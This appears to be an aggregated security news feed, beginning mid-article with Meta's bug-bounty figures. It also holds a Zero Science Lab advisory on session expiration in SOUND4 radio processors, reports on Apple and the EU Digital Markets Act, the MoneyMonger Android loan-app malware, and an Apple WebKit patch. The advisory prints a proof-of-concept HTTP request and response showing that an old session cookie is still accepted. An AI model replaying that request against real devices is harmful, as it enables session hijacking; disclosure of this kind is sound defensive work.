Many of these programs include Safe Harbor clauses that exempt security researchers working under the bug-bounty program from legal liability for their research. For vendors, the programs offer a way to get top-notch security researchers to essentially conduct penetration tests on their platforms in a relatively cost-effective manner. Importantly, it also gives them a better shot at ensuring that researchers report a vulnerability directly to them rather than disclosing it publicly before a fix is available, or worse, selling it to a gray-market purchaser.

Some, though, have cautioned about such programs collapsing under the volume of bug reports that researchers can submit, especially if the organization's security team isn't mature enough or ready enough to respond to them.

**Large Volume of Reports**

Since Facebook launched its bug-bounty program in 2011, the company has received more than 170,000 reports from bug hunters around the world. The company identified more than 8,500 of those reports to be valid vulnerability disclosures, for which it has paid a total of $16 million in rewards. 

So far this year, Meta has received some 10,000 reports from researchers in 45 countries and issued bounties totaling more than $2 million for 750 or so identified vulnerabilities. India, Nepal, and Tunisia topped the list of countries in terms of where bounties were awarded so far this year.

"One benefit of having a 10-plus-year bug-bounty program is that some of our researchers have dedicated years to hunting on our platform and have become extremely familiar with our products and services," Oren says. "These researchers are able to dig beyond surface-level issues and help us identify impactful but niche bugs that the broader community wouldn't necessarily know to look for."

One example of impactful-but-niche was an account takeover and 2FA bypass chain issue that a long-time security researcher reported this year in Facebook's phone number-based account recovery flow; the vulnerability could have allowed an attacker to reset passwords and take over accounts unprotected by 2FA. Meta awarded $163,000 for the discovery.

Meta Ponies Up $300K Bounty for Zero-Click Mobile RCE Bugs in Facebook

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffers from an insufficient session expiration vulnerability.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Insufficient Session ExpirationVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: 4.1.102Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: The application suffers an insufficient session expiration. Thisoccurs when the web application permits an attacker to reuse old sessioncredentials or session IDs for authorization. Insufficient session expirationincreases the device's exposure to attacks that can steal or reuse user'ssession identifiers.Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5724Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5724.php26.09.2022--Session valid after 96 hours:POST /checklogin.php HTTP/1.1Host: RADIOCookie: PHPSESSID=q9rooqkl3kl20aianmveimu23q; monitor-mp3-bitrate=128; monitor-volume=1; settings_accordion_active=3; netdiagsaccordion_last=0Content-Length: 34Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"Accept: */*Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://RADIOSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://RADIO/linkandshare.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: closesession=q9rooqkl3kl20aianmveimu23qHTTP/1.1 200 OKDate: Sat, 03 Jan 1970 11:13:19 GMTServer: Apache/2.4.25 (Unix) OpenSSL/1.0.2k PHP/7.1.1X-Powered-By: PHP/7.1.1Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheVary: User-AgentContent-Length: 1Connection: closeContent-Type: text/html; charset=UTF-80

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x Insufficient Session Expiration

Categories: Apple
Categories: News
Tags: Apple

Tags:  DMA

Tags:  Digital Markets Act

Tags:  European Commission

Tags:  EU

Tags:  iPhone

Tags:  iPad

Tags:  Big Tech

Tags:  App Store

More freedom and greater risks could be on the cards for European users.



(Read more...)




The post Is Apple about to embrace third-party app stores? appeared first on Malwarebytes Labs.

On Tuesday, Bloomberg reported that Apple is preparing to allow access to third-party app stores on all iPhone and iPad devices owned by EU users, in anticipation of a new EU competition law coming into force in mid-2024. If the reporting is correct, then in future users in the EU will no longer be confined to the "walled garden" of the App Store and will be free to download apps from stores owned by companies other than Apple. If it happens, the move will bring both increased freedom and increased security risks.

**The Digital Markets Act**

The Digital Markets Act (DMA), also referred to as Regulation (EU) 2022/1925, was introduced by the European Commission, the executive arm of the EU, in December 2020 and was recently signed into law, in September 2022. It aims to "ban certain practices used by large platforms acting as 'gatekeepers' and enable the Commission to carry out market investigations and sanction non-compliant behaviour". 

It targets the most prominent "Big Tech" companies operating within the EU. The Commission has yet to provide a list of gatekeepers, but Apple is expected to be one of them.

A gatekeeper is defined by the DMA as a platform operating on one or more of the world's digital core services, which includes advertising, search, and social networking, in at least three EU countries and satisfies the following criteria:

*   Has an annual turnover of 7.5B EUR ($8.2B) or a market capitalization of 75B EUR ($82B)
*   Provides certain services, such as browsers, messengers, and social media, that have 45M EU users per month minimum and 10,000 annual business users

Non-compliant gatekeepers could be subjected to fines of at least 10 percent of their previous year's annual worldwide turnover (20 percent for repeat offenders). Systemic violations could lead to a ban on acquiring other companies for a particular time.

"The agreement ushers in a new era of tech regulation worldwide. The Digital Markets Act puts an end to the ever-increasing dominance of Big Tech companies," said Andreas Schwab, an Internal Market and Consumer Protection Committee of the Parliament rapporteur. "From now on, they must show that they also allow for fair competition on the internet. The new rules will help enforce that basic principle. Europe is thus ensuring more competition, more innovation and more choice for users."

"As the European Parliament, we have made sure that the DMA will deliver tangible results immediately: consumers will get the choice to use the core services of Big Tech companies such as browsers, search engines or messaging, and all that without losing control over their data."

**New laws, new risks**

Indeed, the DMA could usher in new business opportunities for small businesses and app developers, and give European users access to more apps and different pricing models. But with change comes challenges. Apple's move to open the platform for other app stores threatens its services business and could introduce security risks.

Apple told Reuters that "allowing sideloading, bypassing its App Store, exposes users to security and privacy dangers". On the other hand, some regulators and Apple critics say these are overblown.

Thomas Reed, Malwarebytes Director for Mac and Mobile, disagrees, and thinks Apple may take extra steps to beef up security around apps from third-party stores.

> There's a lot of potential for this to undermine Apple's security, so I'd expect there to be a lot of effort put into securing it. It's possible third-party app stores, and apps downloaded from them, will have to run in some kind of sandbox that limits what they're able to do,”

Alternatively, says Reed, Apple might let users embrace a less secure environment.

> It's also possible Apple will create a less-secure mode, somewhat like Android's developer mode, that users have to turn on explicitly. Although I don't think this is likely and seems more out-of-character for Apple, as it would open up the device to more abuse.

He sees problems with potentially unwanted programs (PUPs) either way though.

> Regardless of how they do it, I expect to see a big problem with PUPs in those third-party stores. Apple already has a problem policing its store, and they have way more resources to throw at it than any third-party would. I also see the potential for bogus third-party stores, not just app scams.
> 
> We'll be entering a whole new world where users will be able to download from numerous untrustworthy sources. I predict security issues will abound as a result.

**We don't just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Is Apple about to embrace third-party app stores?

A previously undocumented Android malware campaign has been observed leveraging money-lending apps to blackmail victims into paying up with personal information stolen from their devices.
Mobile security company Zimperium dubbed the activity MoneyMonger, pointing out the use of the cross-platform Flutter framework to develop the apps.
MoneyMonger "takes advantage of Flutter's framework to

A previously undocumented Android malware campaign has been observed leveraging money-lending apps to blackmail victims into paying up with personal information stolen from their devices.

Mobile security company Zimperium dubbed the activity **MoneyMonger**, pointing out the use of the cross-platform Flutter framework to develop the apps.

MoneyMonger "takes advantage of Flutter's framework to obfuscate malicious features and complicate the detection of malicious activity by static analysis," Zimperium researchers Fernando Sanchez, Alex Calleja , Matteo Favaro, and Gianluca Braga said in a report shared with The Hacker news.

"Due to the nature of Flutter, the malicious code and activity now hide behind a framework outside the static analysis capabilities of legacy mobile security products."

The campaign, believed to be active since May 2022, is part of a broader effort previously disclosed by Indian cybersecurity firm K7 Security Labs.

None of the 33 apps used in the deceptive scheme have been distributed through the Google Play Store. The money lending applications, instead, are available through unofficial app stores or sideloaded to the phones via smishing, compromised websites, rogue ads, or social media campaigns.

Once installed, the malware poses a risk as it's designed to prompt the users to grant it intrusive permissions under the pretext of guaranteeing a loan, and harvest a wide range of private information.

The collected data – which includes GPS locations, SMSes, contacts, call logs, files, photos, and audio recordings – is then used as a pressure tactic to force victims into paying excessively high-interest rates for the loans, sometimes even in cases after the loan is repaid.

To make matters worse, the threat actors subject the borrowers to harassment by threatening to reveal their information, call people from the contact list, and send abusive messages and morphed photos from the infected devices.

The scale of the campaign is unclear owing to the use of sideloading and third-party app stores, but the rogue apps are estimated to have racked up over 100,000 downloads through the distribution vector.

"The extremely novel MoneyMonger malware campaign highlights a growing trend by malicious actors to use blackmail and threats to scam victims out of money," Richard Melick, director of mobile threat intelligence at Zimperium, said in a statement.

"Quick loan programs are often full of predatory models, such as high-interest rates and payback schemes, but adding blackmail into the equation increases the level of maliciousness."

The findings come two weeks after Lookout discovered nearly 300 mobile loan applications on Google Play and Apple's App Store that collectively have more than 15 million downloads and have been found engaging in predatory behavior.

These apps not only exfiltrate extraordinary volumes of user data but also come with hidden fees, high-interest rates, and payment terms that are used to strong-arm victims for payment on fraudulent loans.

"They exploit victims' desire for quick cash to ensnare borrowers into predatory loan contracts and require them to grant access to sensitive information such as contacts and SMS messages," Lookout noted late last month.

Developing countries are a prime target for dodgy loan apps, as digital lending has seen explosive growth in markets like India, where people are unwittingly turning to such platforms after being turned away by banks for failing to meet income requirements.

The exploitative nature of the personal loan terms has also led to multiple incidents of suicides in the country, prompting the Indian government to initiate work on an allowlist of legal digital lending apps that are permitted in app stores.

Google, in August, disclosed it had removed more than 2,000 credit disbursement apps from its Play Store in India since the start of the year for violating its terms.

The government has also sought urgent strict action by law enforcement agencies against loan apps, a majority of them Chinese-controlled, that have been found to use harassment, blackmail, and harsh recovery techniques.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Android Malware Campaign Leverages Money-Lending Apps to Blackmail Victims

Without many details, Apple patches a vulnerability that has been exploited in the wild to execute code.

The latest Apple security update includes a fix for an actively exploited security vulnerability that could allow arbitrary code execution on iPhone 8 and above. 

The bug, fixed with the iOS 16.1.2 update, is a type confusion issue in the WebKit browser engine. Type confusion occurs when a piece of code doesn't verify the type of object that is passed to it; in this case, it can be be triggered when processing specially crafted content, Apple noted in its advisory. 

As for the active exploitation, the mobile giant noted that it is "aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.1."

Apple has been plagued by zero-day exploits over the past several months.  

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Tag

#apple